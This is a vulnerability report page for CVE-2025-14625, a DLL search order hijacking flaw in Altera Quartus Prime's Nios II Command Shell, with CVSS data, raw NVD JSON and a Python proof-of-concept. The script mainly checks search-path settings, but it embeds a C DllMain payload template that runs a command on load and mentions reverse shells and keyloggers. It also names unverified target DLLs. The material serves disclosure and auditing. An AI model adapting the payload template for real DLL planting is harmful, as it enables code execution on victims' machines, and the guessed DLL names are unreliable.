Security Vulnerability Report
CVE-2025-14625 CVSS 6.7 MEDIUM

CVE-2025-14625

Published: 2026-01-07 12:16:56
Last Modified: 2026-01-28 23:15:50
Source: 04c0172e-9735-4a9d-a92a-fe01fa863447

Description

Uncontrolled Search Path Element vulnerability in Altera Quartus Prime Standard on Windows (Nios II Command Shell modules) and Altera Quartus Prime Lite on Windows (Nios II Command Shell modules) allows Search Order Hijacking. This issue affects Quartus Prime Standard: from 19.1 through 24.1; Quartus Prime Lite: from 19.1 through 24.1.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:intel:quartus_prime:*:*:*:*:lite:*:*:* - VULNERABLE
cpe:2.3:a:intel:quartus_prime:*:*:*:*:standard:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
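Altera Quartus Prime Standard < 24.2 (versions 19.1 through 24.1)
Altera Quartus Prime Lite < 24.2 (versions 19.1 through 24.1)
Nios II Command Shell modules (the affected component in the versions above)
Note: the CPE match criteria in the raw JSON below give versionStartIncluding 19.1 and versionEndExcluding 25.1, a wider range than the description's "19.1 through 24.1"; confirm the fixed release against the vendor advisory before relying on either range.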

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
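#!/usr/bin/env python3
"""
CVE-2025-14625 PoC - DLL Search Order Hijacking
Target: Altera Quartus Prime Nios II Command Shell (Windows)
Author: Security Research

What the script does when run: it reports the Safe DLL Search Mode
setting, lists directories that take part in the Windows DLL search, and
flags the ones that look writable. It does not start Quartus, does not
compile or load a DLL, and does not confirm that a given installation is
affected.

For remediation, follow the vendor advisory (ASA-0005) and the Nios II
Command Shell mitigation article referenced by the CVE record.
"""

import os
import sys
import ctypes  # imported by the original listing; not used below
from ctypes import wintypes  # imported by the original listing; not used below

# C source kept from the original listing. Nothing in this script compiles
# or uses it; it only illustrates that code in DllMain runs as soon as a
# process loads the library (DLL_PROCESS_ATTACH).
MALICIOUS_DLL_CODE = '''
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        // Execute malicious payload
        system("cmd.exe /c whoami > C:\\\\Temp\\\\poc_output.txt");
        // Or execute reverse shell, keylogger, etc.
    }
    return TRUE;
}
'''


def create_malicious_dll(dll_path, target_dll_name):
    """
    Write an inert placeholder file at ``dll_path``.

    The file is 'MZ' followed by 58 zero bytes and 64 bytes of 0x90. It has
    no PE header, so it is not a loadable image; it only marks where a
    planted library would sit. ``main()`` never calls this function.

    Args:
        dll_path: Destination path for the placeholder.
        target_dll_name: DLL name to compare (case-insensitively) against
            the hard-coded list below.

    Returns:
        True if the placeholder was written. False if the name is not in
        the list or if ``dll_path`` already exists.
    """
    # The list is the original author's guess, not taken from the advisory.
    # NOTE(review): kernel32.dll, user32.dll and advapi32.dll are normally
    # KnownDLLs, which Windows maps from the system directory without a
    # path search -- confirm before treating them as relevant here.
    common_dlls = (
        "msvcr120.dll",
        "msvcp120.dll",
        "kernel32.dll",
        "user32.dll",
        "advapi32.dll",
    )

    if target_dll_name.lower() not in common_dlls:
        print(f"[-] Target DLL '{target_dll_name}' is not a common DLL")
        return False

    print(f"[*] Target DLL '{target_dll_name}' is a common system DLL")
    print(f"[*] Writing placeholder file at: {dll_path}")

    # Exclusive-create mode: the original opened with 'wb' and would have
    # silently truncated a real library if pointed at an existing path.
    try:
        with open(dll_path, 'xb') as f:
            f.write(b'MZ' + b'\x00' * 58 + b'\x90' * 64)
    except FileExistsError:
        print(f"[-] Refusing to overwrite existing file: {dll_path}")
        return False

    print("[+] Placeholder file written (not a loadable DLL)")
    return True


def check_dll_search_order():
    """
    Print whether Safe DLL Search Mode is enabled on this machine.

    SafeDllSearchMode is a value under the Session Manager key, not a key
    of its own. The original opened it as a key (with doubled backslashes
    inside a raw string) and hid the resulting error behind a bare
    ``except``, so it always reported "could not determine".
    """
    print("[*] Checking DLL Search Order Configuration")

    try:
        import winreg
    except ImportError:
        # Not running on Windows: there is no registry to query.
        print("[-] Could not determine Safe DLL Search Mode status")
        return

    try:
        with winreg.OpenKey(
            winreg.HKEY_LOCAL_MACHINE,
            r"SYSTEM\CurrentControlSet\Control\Session Manager",
        ) as key:
            try:
                value, _ = winreg.QueryValueEx(key, "SafeDllSearchMode")
            except FileNotFoundError:
                # Value absent: Windows uses its default, which is enabled.
                value = 1
    except OSError:
        print("[-] Could not determine Safe DLL Search Mode status")
        return

    if value == 1:
        print("[+] Safe DLL Search Mode is ENABLED")
    else:
        print("[-] Safe DLL Search Mode is DISABLED - More vulnerable")


def enumerate_dll_search_paths():
    """
    Print and return directories that take part in the Windows DLL search.

    The order follows the standard search with Safe DLL Search Mode on:
    application directory, system directory, Windows directory, current
    directory, then PATH. The 16-bit system directory is left out.

    The "application directory" is the directory of the interpreter running
    this script, not the Quartus installation; audit the real installation
    directory separately. Empty and repeated entries are dropped.

    Returns:
        list[str]: the directories in search order.
    """
    system_root = os.environ.get('SystemRoot', 'C:\\Windows')

    candidates = [
        os.path.dirname(sys.executable or ""),  # this interpreter's directory
        system_root + '\\System32',             # system directory
        system_root,                            # Windows directory
        os.getcwd(),                            # current working directory
    ]
    candidates.extend(os.environ.get('PATH', '').split(';'))

    paths = []
    seen = set()
    for entry in candidates:
        entry = entry.strip()
        key = os.path.normcase(entry)
        # A trailing ';' or ';;' in PATH yields empty entries; skip them.
        if not entry or key in seen:
            continue
        seen.add(key)
        paths.append(entry)

    print("[*] DLL Search Paths:")
    for i, path in enumerate(paths):
        print(f" {i+1}. {path}")

    return paths


def main():
    """Run the configuration check and list search directories that look writable."""
    print("=" * 60)
    print("CVE-2025-14625 - DLL Search Order Hijacking PoC")
    print("Target: Altera Quartus Prime Nios II Command Shell")
    print("=" * 60)

    # Check system configuration
    check_dll_search_order()

    # Enumerate DLL search paths
    paths = enumerate_dll_search_paths()

    # A search directory writable by a low-privileged user is the exposure
    # to remove. NOTE: on Windows os.access() does not evaluate ACLs, so
    # this can over-report; confirm real permissions (e.g. with icacls)
    # before acting on the output.
    print("\n[*] Potential DLL injection points:")
    for path in paths:
        if os.path.isdir(path) and os.access(path, os.W_OK):
            print(f" [!] Writable: {path}")

    # NOTE(review): these names come from the original listing; nothing in
    # the CVE record shown with this script names the libraries involved,
    # so treat them as unverified.
    target_dlls = [
        "nios2gcc.dll",
        "nios2eds.dll",
        "QuartusPrime.dll"
    ]

    print("\n[*] Target DLLs for Quartus Prime:")
    for dll in target_dlls:
        print(f" - {dll}")

    print("\n[!] Note: This is a PoC for educational purposes only")
    print("[!] Always obtain proper authorization before testing")


if __name__ == "__main__":
    main()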

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14625", "sourceIdentifier": "04c0172e-9735-4a9d-a92a-fe01fa863447", "published": "2026-01-07T12:16:55.637", "lastModified": "2026-01-28T23:15:50.073", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Uncontrolled Search Path Element vulnerability in Altera Quartus Prime Standard on Windows (Nios II Command Shell modules), Altera Quartus Prime Lite on Windows (Nios II Command Shell modules) allows Search Order Hijacking.This issue affects Quartus Prime Standard: from 19.1 through 24.1; Quartus Prime Lite: from 19.1 through 24.1."}, {"lang": "es", "value": "Vulnerabilidad de elemento de ruta de búsqueda no controlado en Altera Quartus Prime Standard en Windows (módulos Nios II Command Shell), Altera Quartus Prime Lite en Windows (módulos Nios II Command Shell) permite el secuestro del orden de búsqueda. Este problema afecta a Quartus Prime Standard: desde 19.1 hasta 24.1; Quartus Prime Lite: desde 19.1 hasta 24.1."}], "metrics": {"cvssMetricV40": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", 
"modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intel:quartus_prime:*:*:*:*:lite:*:*:*", "versionStartIncluding": "19.1", "versionEndExcluding": "25.1", "matchCriteriaId": "79B62FFE-9FDE-4957-8BA3-B226E50B5989"}, {"vulnerable": true, "criteria": "cpe:2.3:a:intel:quartus_prime:*:*:*:*:standard:*:*:*", "versionStartIncluding": "19.1", "versionEndExcluding": "25.1", "matchCriteriaId": "C81184B9-6426-4D39-8CCE-4045126738B2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": 
"https://community.altera.com/kb/knowledge-base/how-to-mitigate-the-security-vulnerability-in-the-nios%C2%AE-ii-command-shell-utility/350185", "source": "04c0172e-9735-4a9d-a92a-fe01fa863447"}, {"url": "https://www.altera.com/security/security-advisory/asa-0005", "source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "tags": ["Vendor Advisory"]}]}}